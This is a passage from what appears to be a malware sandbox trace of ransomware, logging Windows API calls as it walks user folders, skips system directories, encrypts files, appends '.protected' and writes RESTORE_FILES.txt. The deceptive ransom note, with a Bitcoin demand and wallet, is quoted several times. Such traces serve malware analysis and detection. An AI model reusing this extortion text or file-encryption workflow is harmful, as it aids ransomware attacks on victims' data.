\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.383] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.384] lstrlenA (lpString="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") returned 684 [0090.384] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.384] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.384] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.384] CloseHandle (hObject=0x150) returned 1 [0090.384] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Windows") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Program Files") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="Program Files (x86)") returned -1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="$Recycle.bin") returned 1 [0090.384] lstrcmpiW (lpString1="CTLs", lpString2="System Volume Information") returned -1 [0090.384] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 86 [0090.384] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0090.384] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0090.384] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned 88 [0090.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.") returned 88 [0090.385] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0090.385] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.385] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.385] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\..") returned 89 [0090.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.385] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.385] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: 
pbBuffer=0x295e4fc) returned 1 [0090.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.385] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.385] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.385] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt") returned 104 [0090.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.386] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.386] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.387] lstrlenA (lpString="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") returned 684 [0090.387] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.387] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.387] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.387] CloseHandle (hObject=0x150) returned 1 [0090.387] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.387] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.387] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt") returned 99 [0090.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.388] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.388] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.389] lstrlenA (lpString="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") returned 684 [0090.389] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.389] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.389] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.389] CloseHandle (hObject=0x14c) returned 1 [0090.390] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.390] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.390] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt") returned 96 [0090.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.390] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.390] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.391] lstrlenA (lpString="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") returned 684 [0090.391] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.391] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.391] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.391] CloseHandle (hObject=0xd8) returned 1 [0090.391] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0090.391] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0090.392] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0090.392] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0090.392] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned 69 [0090.392] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0090.392] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0090.392] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned 71 [0090.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\.") returned 71 [0090.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.393] 
FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\..") returned 72 [0090.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.393] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Windows") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Program Files") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="Program Files (x86)") returned -1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="$Recycle.bin") returned 1 [0090.393] lstrcmpiW (lpString1="Normal.dotm", lpString2="System Volume Information") returned -1 [0090.393] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.393] StrStrIW (lpFirst="Normal.dotm", lpSrch=".protected") returned 0x0 [0090.393] lstrcmpW (lpString1="Normal.dotm", lpString2="RESTORE_FILES.txt") returned -1 [0090.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | 
out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".txt") returned 0x0 [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".rar") returned 0x0 [0090.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 81 [0090.394] StrStrW (lpFirst="Normal.dotm", lpSrch=".zip") returned 0x0 [0090.394] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.404] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | 
out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.404] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.404] CloseHandle (hObject=0x14c) returned 1 [0090.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.protected") returned 91 [0090.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.protected")) returned 1 [0090.405] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.405] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.405] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\RESTORE_FILES.txt") returned 87 [0090.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.406] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.406] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.407] lstrlenA 
